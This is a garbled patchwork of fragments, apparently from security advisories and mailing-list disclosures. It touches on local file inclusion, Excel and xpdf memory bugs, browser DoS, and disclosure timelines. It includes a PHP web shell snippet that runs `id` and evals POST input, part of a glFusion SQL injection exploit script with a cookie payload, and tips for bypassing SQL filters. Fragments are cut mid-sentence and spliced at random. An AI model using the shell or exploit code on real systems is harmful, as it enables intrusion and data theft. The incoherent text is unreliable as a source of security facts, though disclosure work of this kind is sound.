void display_redraw(void)
{
switch(DisplayMode) {
...
case DisplaySplit: /* BL */
split_redraw();
break;
...
}
}
leading to a local file inclusion attack.
Note: Omitting the '.php' extension (to include an arbitrary file such as /etc/passwd) by using a NULL character is not possible in this case, because a %00 in the REQUEST_URI is not decoded automatically by the web server, and there is no urldecode() call to decode it before the require_once call either.
if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("../admin/lang/".$lang."/reports/ops/forum.php");
break;
case "download":
include("../admin/lang/".$lang."/reports/ops/download.php");
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>Created by Cr@zy_King</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
}
q++;
n = 0;
while (q > buf && memchr(itoa64, *--q, 64)) n++;
switch (n) {
case 22:
/* MD5-based */
if (q < buf + (1+1+1+3+1+1-1)) continue;
if (*q != '$') continue;
n = 0;
while (q > buf && memchr(itoa64, *--q, 64)) n++;
-----/
8.2. *Memory Corruption related to Graphic Description [MSRC case 9562]*
Core Security Technologies reported a second bug in Excel which turned out
to be non-exploitable. In its investigation, MSRC analyzed the BIFF5++, BIFF4,
and BIFF2 file formats for exploitability of this vulnerability. MSRC
has been unable to reproduce it in such a way that an exploitable
#endif
}
OK. So if we pass a negative value to gmalloc(), xpdf terminates via an exit() call
and prints "Invalid memory allocation size\n" to stderr. If we pass 0 (zero),
the function returns NULL. In all other cases there is a normal call to malloc().
OK, so let's look further.
"./splash/Splash.cc"
SplashError Splash::drawImage(SplashImageSource src, void *srcData,
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);
switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
-[ Buffer [6]
The data used to fill the buffer does not need to be static, so ENG fills the
entire buffer with random data, using a very, very simple technique that any
student is able to apply while learning the C programming language:
1. Check the length of the buffer to overflow: in this case it is 96 bytes;
2. Make a choice: lower case or mixed case;
3. Use randomized data to fill it up: lower case (0x41 to 0x5a) and mixed case
(0x41 to 0x5a for odds and 0x61 to 0x7a for evens)
value = 0; /* we have no value to print now */
/* Flags */
while (1) {
switch (*++fmt) {
case '=': /* fill character */
pad_char = *++fmt;
if (pad_char == '\0')
goto format_error;
continue;
case '^': /* not group currency */
. 2010-04-16:
Initial notification to the vendor. Draft advisory and proof-of-concept
files sent to MSRC. Publication date set for May 10, 2010.
. 2010-04-19:
MSRC responds that case 9975cw has been opened.
. 2010-04-27:
New case manager assigned by MSRC to handle the case. The issue is still
being investigated.
app you guys just deface the site or throw up drive-by attacks. So I figured, persistent XSS on the
front page is equally as valuable, especially with yet another IE 0-day in the wild. The chain is within
the application itself. Process sand-boxing like chroot/AppArmor/SELinux/Application-V(MS)
doesn't come into play. It works regardless of the operating system or configuration (Suhosin,
safemode, magic_quotes_gpc and register_globals don't come into play). I focused on the
application's internal configurations that could break the exploitation process. In this case SEO-friendly
URLs and requiring an account before posting.
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY
------------------------------------------------------------------------
While doing a quick sweep over the code base of FreeWebshop.org (FWS),
several vulnerabilities were found in FWS. These vulnerabilities
allow attackers to obtain arbitrary information from the web server and
database. It is even possible to execute arbitrary code with the
privileges of FWS. In some cases it may even be possible to fully
compromise the system on which FWS is installed. Most of these issues
are related to the fact that FWS fully trusts the content of the cookies
that it receives. Since these issues were discovered within a very small
time frame, it is likely that more issues exist within FWS. A full
security review of the code base is recommended to increase the security
...
P_OP op = receive->p_operation;
switch (op)
{
case op_connect:
...
case op_compile:
...
case op_attach:
...
"vulnerabilities" rather more of "annoyances". Although I don't deny the
fact that certain DoS attacks *may lead* or *may serve as hints* to other
more serious exploits, but that's a different topic and with ASLR in the
scene, a very grey area of discussion.
Case in point: XSS can be of various kinds and most of them (I'm talking of
about 99.99%) can be attributed to the design of the web
technologies/protocol specifications (http, ajax, etc etc...you name it)
and the browsers can only do that much. Hence it's not feasible for a
web browser to 'prevent' them without tampering with the protocol or annoying you
with continuous messages about what it is doing (assuming all users have the
PR07-31: Unauthenticated SQL Injection, XSS and Username Enumeration on
DPSnet Case Progress
Vulnerabilities Found: 23 May 2007
Vendor Contacted: 10 July 2007, 31 August 2007, 17 September 2007, 12
December 2007
Hello Susan!
As I already wrote to you and Adam earlier, every type of disclosure (including
full disclosure and responsible full disclosure) can be good in the appropriate
situation. And I use the type of disclosure which is suitable for each
particular case.
Taking into account that 3 of 4 vendors answered me (except Microsoft), that
Google already had a non-affected Chrome 4, and that Mozilla and Opera promised to
fix it (we'll see when and how they do it), you can see that my
approach works. And responsible full disclosure can force browser vendors to
> This will ONLY work if FireFox does NOT know which program to use.
It's interesting, because as I understand from your first information,
it works in Firefox (via Chrome), and from your previous text ("that FireFox
knows exists on the target operating system") it must work if Firefox does
KNOW which program to use. But in your case the DoS effect is better when
Firefox does not know about the program than if it does know.
> (I'll post it on my own website anyway, giving you credit too of course.)
Thanks. I'm glad that my blocking DoS and DoS via resources consumption
print("[?] Vulnerable!\n");
} else {
die ("[?] Not vulnerable ...");
}
$sessid = login();
$sql = " AND (CASE WHEN (SELECT 1) THEN 1 ELSE 0 END) ) LIMIT 1-- ";
$cookies = "glf_session=$sessid".$sql."; glfusion=9999999999;";
$_o = _s($url, $cookies, 0, "");
if (chk_err($_o)) {
die("[!] MySQL < 4.1!\n");
} else {
The filters are inefficient; see COM_applyFilter(), which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
We are in an ORDER clause and vars are not surrounded by quotes.
Bad chars are e.g. "," , "/" , "'" , ";" , "\" , "\"" , "*" , "`",
but what about spaces and "("... you can use a CASE WHEN .. THEN .. ELSE .. END
construct instead of e.g. IF(..,..,..), and "--" instead of "/*" to close
your query.
And e.g. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible; COM_applyFilter() is a very commonly used one.
DoS of the browser is already a bad thing. And there are many risks for users
from DoS holes in browsers, which I wrote about in 2008 in my articles
Dangers of DoS attacks on browsers and Dangers of resources consumption DoS
attacks. But mostly browser developers ignore fixing these issues.
But in this case it's not only an attack on browsers, but on the user's whole
computer, because it blocks the whole computer and fully consumes its
resources. This works in many browsers, including their latest
versions. So browser developers, with their neglect of this problem, make
possible attacks on users' whole systems. It was one of the leitmotifs of my
advisory.
$in = $notin?' NOT IN ':' IN ';
$concat = $notin?' AND ':' OR ';
$glue = $string?"','":',';
switch($DB['TYPE']) {
case 'SQLITE3':
case 'MYSQL':
case 'POSTGRESQL':
case 'ORACLE':
default:
$items = array_chunk($array, 950);
8.2. *Second Proof-of-Concept*
By generating a second malformed .MBM file (available at [2]), we can
trigger a heap overflow that may lead to arbitrary code execution. In
this case, the crash occurs in the following code:
/-----
77F937A5 8901 MOV DWORD PTR DS:[ECX],EAX
77F937A7 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
77F937AA 3BC1 CMP EAX,ECX
> >> understand, how the original reporter managed to gain access to the file in the
> >> restricted directory using that symlink.
> >
> > The perms are definitely broken and without a code audit on procfs I
> > would not bet that this is limited just to this rather obscure test
> > case.
> >
> > To be honest, I hope that it is limited to this rather obscure test
> > case. If it is not there may be entertaining ramifications.
> >
> Given my citation above (I personally use Linux), that obscure test case looks
Hello MustLive,
Thanks for your immediate reply.
I have now tested what you said, because I suspected that it was only happening because Google Chrome was installed, since FireFox isn't able to know what "chromehtml:" is on its own (it has to be associated with an application in this case).
The following would open a lot of windows, most likely consuming all resources:
http://websecurity.com.ua/uploads/2009/Google%20Chrome%20DoS%20Exploit2.html
FireFox version: FireFox 3.5.2 (Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
8.2.1. *Vulnerable function*
We believe the vulnerable function to be face_array_read(), starting at
line 238 in file src/lib3ds_mesh.c of lib3ds. The vulnerable code is
executed in case CHK_MSH_MAT_GROUP of the following switch statement:
/-----
[Function:src/lib3ds_mesh.c:face_array_read()]
switch (chunk) {
Insufficient domain name validation
------------------------------------------------------------------------
Once the ActiveX control is installed, attackers might utilize this
control to install malicious software. To prevent this from happening,
getPlus verifies the URL before downloading and installing software from
it. In the case of Adobe's version of getPlus, getPlus validates
whether the domain name in the URL ends with .adobe.com. If this is not the
case, getPlus shows a warning message and refuses to download the
file from the supplied URL.
http://www.akitasecurity.nl/advisory/AK20090401/001_getplus_URL_not_allowed.png
connected to an untrusted Internet site are those specified by the
security policies of the Internet Zone at the Medium-High security level.
There are some issues in the way IE enforces zone security policies when
a URI is specified in the UNC form (i.e.,
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'). In this case, Internet
Explorer classifies as *Internet Zone* any UNC address pointing to an IP
address, including '127.0.0.1'. As a result, any website (belonging to
any security zone) can address and redirect the navigation flow to files
stored in '\\127.0.0.1'.
{
u_int64_t val;
val = 0;
switch (e->e_ident[EI_CLASS]) {
case ELFCLASS32:
base = (char *)base + elf32_offsets[member];
switch (e->e_ident[EI_DATA]) {
case ELFDATA2MSB:
val = be32dec(base);
break;